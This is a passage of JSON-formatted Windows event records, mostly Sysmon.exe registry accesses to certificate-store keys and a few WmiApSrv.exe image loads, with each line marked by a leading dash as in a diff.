"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiApSrv.exe", - "image_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\System32\\psapi.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "loadperf.dll", - "image_path": "C:\\Windows\\System32\\loadperf.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
